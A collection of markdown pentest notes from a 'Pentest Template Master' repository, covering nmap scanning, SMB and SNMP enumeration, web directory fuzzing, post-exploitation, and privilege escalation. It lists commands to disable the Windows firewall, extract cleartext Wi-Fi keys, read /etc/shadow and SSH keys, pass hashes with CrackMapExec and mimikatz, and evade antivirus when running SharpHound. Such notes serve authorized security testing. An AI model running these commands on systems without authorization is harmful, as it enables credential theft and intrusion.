https://www.fuzzysecurity.com/tutorials/16.html 37 | - SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite 38 | - Watson: https://github.com/rasta-mouse/Watson 39 | - WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn 40 | 41 | Linux: 42 | - GTFOBins: https://gtfobins.github.io/ 43 | - g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. 
General Notes.md: -------------------------------------------------------------------------------- 1 | ## Spawn a tty: 2 | 3 | 1. rlwrap nc localhost 80 4 | 5 | 2. rlwrap -r -f . nc 6 | 7 | - socat file:`tty`,raw,echo=0 tcp-listen:12345 8 | - /bin/sh -i 9 | - /bin/bash -i 10 | - python -c 'import pty; pty.spawn("/bin/sh")' 11 | - perl -e 'exec "/bin/sh";' 12 | - perl: exec "/bin/sh"; 13 | - ruby: exec "/bin/sh" 14 | - lua: os.execute('/bin/sh') 15 | 16 | ## Priviledge Escalation Scripts: 17 | 18 | Windows: 19 | - Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng 20 | - Sherlock: https://github.com/rasta-mouse/Sherlock 21 | - Powersploit: https://github.com/PowerShellMafia/PowerSploit 22 | - WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 23 | - PrivescCheck: https://github.com/itm4n/PrivescCheck 24 | 25 | Linux: 26 | - Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2 27 | - LinEnum: https://github.com/rebootuser/LinEnum 28 | - UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check 29 | - LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 30 | 31 | ## Other Resources: 32 | 33 | PowerSharpPack: 34 | - https://github.com/S3cur3Th1sSh1t/PowerSharpPack 35 | 36 | Windows: 37 | - LOLBAS: https://lolbas-project.github.io/# 38 | - Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html 39 | - SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite 40 | - Watson: https://github.com/rasta-mouse/Watson 41 | - WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn 42 | 43 | Linux: 44 | - GTFOBins: https://gtfobins.github.io/ 45 | - g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest 
Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md: -------------------------------------------------------------------------------- 1 | 2 | ## Enumerate SMB: 3 | 4 | Enum4linux: 5 | 6 | - Enum4linux -a 172.21.0.0 7 | 8 | SMBmap: 9 | 10 | - smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] 11 | - smbmap -H 172.21.0.0 -d [domain] -u "" -p "" 12 | 13 | Nmap: 14 | 15 | - nmap --script smb-* -p 139,445, 172.21.0.0 16 | - nmap --script smb-enum-* -p 139,445, 172.21.0.0 17 | 18 | /usr/share/nmap/scripts/smb-brute.nse 19 | /usr/share/nmap/scripts/smb-enum-domains.nse 20 | /usr/share/nmap/scripts/smb-enum-groups.nse 21 | /usr/share/nmap/scripts/smb-enum-processes.nse 22 | /usr/share/nmap/scripts/smb-enum-services.nse 23 | /usr/share/nmap/scripts/smb-enum-sessions.nse 24 | /usr/share/nmap/scripts/smb-enum-shares.nse 25 | /usr/share/nmap/scripts/smb-enum-users.nse 26 | /usr/share/nmap/scripts/smb-flood.nse 27 | /usr/share/nmap/scripts/smb-ls.nse 28 | /usr/share/nmap/scripts/smb-mbenum.nse 29 | /usr/share/nmap/scripts/smb-os-discovery.nse 30 | /usr/share/nmap/scripts/smb-print-text.nse 31 | /usr/share/nmap/scripts/smb-protocols.nse 32 | /usr/share/nmap/scripts/smb-psexec.nse 33 | /usr/share/nmap/scripts/smb-security-mode.nse 34 | /usr/share/nmap/scripts/smb-server-stats.nse 35 | /usr/share/nmap/scripts/smb-system-info.nse 36 | 37 | 38 | SMBClient: 39 | 40 | - smbclient -L 172.21.0.0 41 | - smbclient //172.21.0.0/tmp 42 | 43 | Impacket SmbClient: 44 | 45 | - /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 46 | 47 | RPCclient: 48 | 49 | - rpcclient -U "" -N 172.21.0.0 enumdomusers 50 | 51 | Impacket: 52 | 53 | - python3 samdump.py SMB 172.21.0.0 54 | 55 | CrackMapExec: 56 | 57 | - crackmapexec smb -L 58 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth 59 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --share 60 | - crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz 61 | 62 | 
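The nmap script scans above are easiest to triage from their XML output (`-oX`). The following is an added example, not code from the template: it parses an nmap XML report into open ports and structured `hostscript` results per host and flags hosts whose `smb-security-mode` result says signing is disabled. The XML is constructed to resemble nmap's schema; it is not real scan output.

```python
"""Summarise an nmap XML (-oX) report from the SMB script scans in these notes.

Added example, not part of the original notes. The sample report below is
constructed (not a real scan); element and attribute names follow nmap's
documented XML output, and the smb-security-mode key names follow that NSE
script's structured output.
"""
import xml.etree.ElementTree as ET

# Constructed sample report resembling:
#   nmap --script "smb-*" -p 139,445 -oX smb.xml 172.21.0.5 172.21.0.6
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --script smb-* -p 139,445 -oX smb.xml">
  <host>
    <status state="up"/>
    <address addr="172.21.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-security-mode" output="message_signing: disabled (dangerous, but default)">
        <elem key="message_signing">disabled</elem>
      </script>
      <script id="smb-os-discovery" output="OS: Windows Server 2016 Standard">
        <elem key="os">Windows Server 2016 Standard</elem>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="172.21.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"open_ports": [int, ...], "scripts": {script_id: {key: value}}}}."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # skip hosts with no IPv4 address element
        ip = addr.get("addr")
        open_ports = [
            int(port.get("portid"))
            for port in host.findall("ports/port")
            if port.find("state").get("state") == "open"
        ]
        # Structured NSE output: <script id=...><elem key=...>value</elem>...</script>
        scripts = {}
        for script in host.findall("hostscript/script"):
            scripts[script.get("id")] = {
                elem.get("key"): (elem.text or "").strip()
                for elem in script.findall("elem")
            }
        hosts[ip] = {"open_ports": open_ports, "scripts": scripts}
    return hosts


def signing_disabled(hosts):
    """IPs whose smb-security-mode result reports SMB signing disabled.

    A host without the script result (no SMB reachable) is not reported.
    """
    return sorted(
        ip for ip, info in hosts.items()
        if info["scripts"].get("smb-security-mode", {}).get("message_signing") == "disabled"
    )


if __name__ == "__main__":
    report = parse_nmap_xml(SAMPLE_XML)
    for ip, info in report.items():
        print(ip, "open:", info["open_ports"], "scripts:", sorted(info["scripts"]))
    print("SMB signing disabled on:", signing_disabled(report))
```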
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md:
--------------------------------------------------------------------------------
## Enumerate SMB:

Enum4linux:

- enum4linux -a 172.21.0.0

SMBmap:

- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""

Nmap:

- nmap --script "smb-*" -p 139,445 172.21.0.0
- nmap --script "smb-enum-*" -p 139,445 172.21.0.0

```
/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-services.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
```

SMBClient:

- smbclient -L 172.21.0.0
- smbclient //172.21.0.0/tmp

Impacket SmbClient:

- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0

RPCclient:

- rpcclient -U "" -N 172.21.0.0 enumdomusers

Impacket:

- python3 samrdump.py SMB 172.21.0.0

CrackMapExec:

- crackmapexec smb -L
- crackmapexec smb 172.21.0.0 -u Administrator -H [hash] --local-auth
- crackmapexec smb 172.21.0.0 -u Administrator -H [hash] --shares
- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md:
--------------------------------------------------------------------------------
# Notes:
- Remember to run nmap with sudo privileges, or set Linux capabilities on the binary to give nmap the privileges it needs.

To set Linux capabilities on nmap:
```
sudo apt-get install libcap2-bin
sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
getcap $(which nmap)
nmap --privileged
```

# Default Scans
- nmap -sC -sV 172.21.0.0
- nmap -Pn -sC -sV -p- 172.21.0.0
- nmap -sV -Pn 172.21.0.0
- nmap -T4 -sC -sV 172.21.0.0
- nmap -vv -Pn -A -sC -sS -T4 -p- 172.21.10.0/24 -oA fullscan

# Stealth Scans:
- nmap -sS -sC -sV 172.21.0.0
- nmap -sS -p- 172.21.0.0

# UDP Scan:
- nmap -sS -sU -Pn -sV 172.21.0.0
- nmap -sU -A --top-ports=20 --version-all
- nmap -sU -A -p 53,67,68,161,162 --version-all

# Aggressive Scans:
Once you have results from your initial scan, run an aggressive scan in the background to obtain more information on the hosts the initial scan found:

- nmap -oA fullscan-aggressive -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt

If scans are not completing or are skipping hosts too quickly, change the `--max-rtt-timeout` and `--max-scan-delay` settings. Additionally, for a slower, more complete, stealthier approach, the following can be used:
- nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_x.x.x.x-all_ports_slow.xml -iL x.x.x.x_Active_IPs.txt

TCP:

# Nmap Scripts:

Location: /usr/share/nmap/scripts/

- nmap --script vuln,safe,discovery -oN results.txt target-ip

# Scans through Socks proxy:

- nmap --proxies socks4://proxy-ip:8080 target-ip

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md:
--------------------------------------------------------------------------------
## List all network interfaces, IP, and DNS.

- ipconfig /all
- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
- Get-DnsClientServerAddress -AddressFamily IPv4 | ft

## List all current connections

- netstat -nao

## List firewall state and current configuration

- netsh advfirewall firewall dump
- netsh firewall show state
- netsh firewall show config

## List firewall's blocked ports

- $f=New-Object -ComObject HNetCfg.FwPolicy2; $f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

## Disable firewall

- netsh firewall set opmode disable (Older Versions of Windows)
- netsh advfirewall set allprofiles state off

## List current routing table

- route print
- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## List the ARP table

- arp -a
- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## List all network shares

- net share

## Wifi Passwords:

Finding the SSID:
- netsh wlan show profiles

Obtaining the cleartext password:
```
netsh wlan show profile key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md:
--------------------------------------------------------------------------------
# BloodHound

### Source:

- https://github.com/BloodHoundAD/BloodHound

## In Kali:
```
$ sudo apt install bloodhound
$ bloodhound
```
## Installing:
```
$ cd /opt
$ sudo git clone https://github.com/BloodHoundAD/BloodHound.git
$ sudo wget https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.3/BloodHound-linux-x64.zip
```

Neo4j has to be running for the BloodHound web app to work:
```
$ sudo neo4j console
```
Set the password if you haven't already.

Start bloodhound:
```
$ sudo ./Bloodhound --no-sandbox
```

## Pre-Compiled Binaries

- https://github.com/BloodHoundAD/BloodHound/releases

## SharpHound:

- https://github.com/BloodHoundAD/SharpHound3

Execute on target:
```
C:\> .\SharpHound.exe -c all
```
or in PowerShell with the .ps1 version:

```
C:\> Import-Module .\sharphound.ps1
C:\> Invoke-BloodHound -CollectionMethod all -domain -LDAPUser -LDAPPass
```
Note: `-domain`, `-LDAPUser`, and `-LDAPPass` are optional; BloodHound will run with only the `-CollectionMethod` flag.

Other useful SharpHound flags:
- `--encryptzip`: allows you to encrypt the file using a random password
- `--zipfilename`: allows you to name the output file so that "bloodhound" isn't in the name in case AV catches it.

If you want to run SharpHound from a PC that is not joined to the target domain, open a command prompt and run:
```
C:\> runas /netonly /user:DOMAIN\USER powershell.exe
```
Then run the PS commands listed above as the domain user in the PowerShell context.

### Bloodhound for python
Note: Only compatible with BloodHound 3.0 or newer

https://github.com/fox-it/BloodHound.py

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md:
--------------------------------------------------------------------------------
## Spawn a tty:

1. rlwrap nc localhost 80

2. rlwrap -r -f . nc

- socat file:`tty`,raw,echo=0 tcp-listen:12345
- /bin/sh -i
- /bin/bash -i
- python -c 'import pty; pty.spawn("/bin/sh")'
- perl -e 'exec "/bin/sh";'
- perl: exec "/bin/sh";
- ruby: exec "/bin/sh"
- lua: os.execute('/bin/sh')

## Privilege Escalation Scripts:

Windows:
- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
- Sherlock: https://github.com/rasta-mouse/Sherlock
- Powersploit: https://github.com/PowerShellMafia/PowerSploit
- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- PrivescCheck: https://github.com/itm4n/PrivescCheck

Linux:
- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
- LinEnum: https://github.com/rebootuser/LinEnum
- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

## Other Resources:

PowerSharpPack:
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack

Windows:
- LOLBAS: https://lolbas-project.github.io/#
- Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html
- Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
- Watson: https://github.com/rasta-mouse/Watson
- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn

Linux:
- GTFOBins: https://gtfobins.github.io/
- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md:
--------------------------------------------------------------------------------
# Sensitive Files to look for:

## Windows:

```
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
%windir%\unattend.xml
%windir%\Windows\Panther\Unattend.xml
%windir%\Windows\Panther\Unattend\Unattend.xml
%windir%\Windows\system32\sysprep.inf
%windir%\Windows\system32\sysprep\sysprep.xml
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```

## Search for contents contained in a file:

```
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
```

## Search for a file with a certain filename:

```
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md:
--------------------------------------------------------------------------------
# Sensitive Files to look for:

## Windows:

```
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
%windir%\unattend.xml
%windir%\Windows\Panther\Unattend.xml
%windir%\Windows\Panther\Unattend\Unattend.xml
%windir%\Windows\system32\sysprep.inf
%windir%\Windows\system32\sysprep\sysprep.xml
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```

## Search for contents contained in a file:

```
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
```

## Search for a file with a certain filename:

```
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md:
--------------------------------------------------------------------------------
# Web Tools for Directory Scanning:

Dirb:

- dirb
- dirb

Gobuster:

- gobuster dir -u -w /usr/share/wordlists/
- gobuster dir -u -w /usr/share/wordlists/ -a Firefox (Custom Agent)
- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html
- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster dir -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt
- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'

Wfuzz:

- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

Dirsearch:

- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

FFuF:

- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403,302,200
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md:
--------------------------------------------------------------------------------
SNMP Walk:

- snmpwalk -c public -v1 ipaddress 1
- snmpwalk -c private -v1 ipaddress 1
- snmpwalk -c manager -v1 ipaddress 1

Nmap:

- nmap 172.21.0.0 -Pn -sU -p 161 --script=

```
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
```

Metasploit aux modules:

```
auxiliary/scanner/misc/oki_scanner
auxiliary/scanner/snmp/aix_version
auxiliary/scanner/snmp/arris_dg950
auxiliary/scanner/snmp/brocade_enumhash
auxiliary/scanner/snmp/cisco_config_tftp
auxiliary/scanner/snmp/cisco_upload_file
auxiliary/scanner/snmp/cnpilot_r_snmp_loot
auxiliary/scanner/snmp/epmp1000_snmp_loot
auxiliary/scanner/snmp/netopia_enum
auxiliary/scanner/snmp/sbg6580_enum
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enum_hp_laserjet
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
```

Onesixtyone:

- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

Snmp-check:

- snmp-check 172.21.0.0 -c public

Impacket:

- python3 samrdump.py SNMP 172.21.0.0

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md:
--------------------------------------------------------------------------------
SNMP Walk:

- snmpwalk -c public -v1 ipaddress 1
- snmpwalk -c private -v1 ipaddress 1
- snmpwalk -c manager -v1 ipaddress 1

Nmap:

- nmap 172.21.0.0 -Pn -sU -p 161 --script=

```
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
```

Metasploit aux modules:

```
auxiliary/scanner/misc/oki_scanner
auxiliary/scanner/snmp/aix_version
auxiliary/scanner/snmp/arris_dg950
auxiliary/scanner/snmp/brocade_enumhash
auxiliary/scanner/snmp/cisco_config_tftp
auxiliary/scanner/snmp/cisco_upload_file
auxiliary/scanner/snmp/cnpilot_r_snmp_loot
auxiliary/scanner/snmp/epmp1000_snmp_loot
auxiliary/scanner/snmp/netopia_enum
auxiliary/scanner/snmp/sbg6580_enum
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enum_hp_laserjet
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
```

Onesixtyone:

- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

Snmp-check:

- snmp-check 172.21.0.0 -c public

Impacket:

- python3 samrdump.py SNMP 172.21.0.0

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md:
--------------------------------------------------------------------------------
## SNMP Walk:

- snmpwalk -c public -v1 ipaddress 1
- snmpwalk -c private -v1 ipaddress 1
- snmpwalk -c manager -v1 ipaddress 1

## Nmap Enumeration:

- nmap 172.21.0.0 -Pn -sU -p 161 --script=

```
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
```

## Metasploit auxiliary modules:

```
auxiliary/scanner/misc/oki_scanner
auxiliary/scanner/snmp/aix_version
auxiliary/scanner/snmp/arris_dg950
auxiliary/scanner/snmp/brocade_enumhash
auxiliary/scanner/snmp/cisco_config_tftp
auxiliary/scanner/snmp/cisco_upload_file
auxiliary/scanner/snmp/cnpilot_r_snmp_loot
auxiliary/scanner/snmp/epmp1000_snmp_loot
auxiliary/scanner/snmp/netopia_enum
auxiliary/scanner/snmp/sbg6580_enum
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enum_hp_laserjet
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
```

Onesixtyone:

- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

Snmp-check:

- snmp-check 172.21.0.0 -c public

Impacket:

- python3 samrdump.py SNMP 172.21.0.0

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md:
--------------------------------------------------------------------------------
## Finding Sensitive files on Linux:

```
locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
```
- cat /etc/profile
- cat /etc/passwd
- cat /etc/group
- cat /etc/shadow
- cat /etc/gshadow
- cat /var/apache2/config.inc
- cat /var/lib/mysql/mysql/user.MYD
- cat /root/anaconda-ks.cfg
- cat ~/.bash_history
- cat ~/.bash_profile
- cat ~/.bash_login
- cat ~/.nano_history
- cat ~/.atftp_history
- cat ~/.mysql_history
- cat ~/.php_history
- ls -alh /var/mail/

Sensitive Files for SSH:

- find / -name authorized_keys 2> /dev/null
- find / -name id_rsa 2> /dev/null

Log Files that could help:

```
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
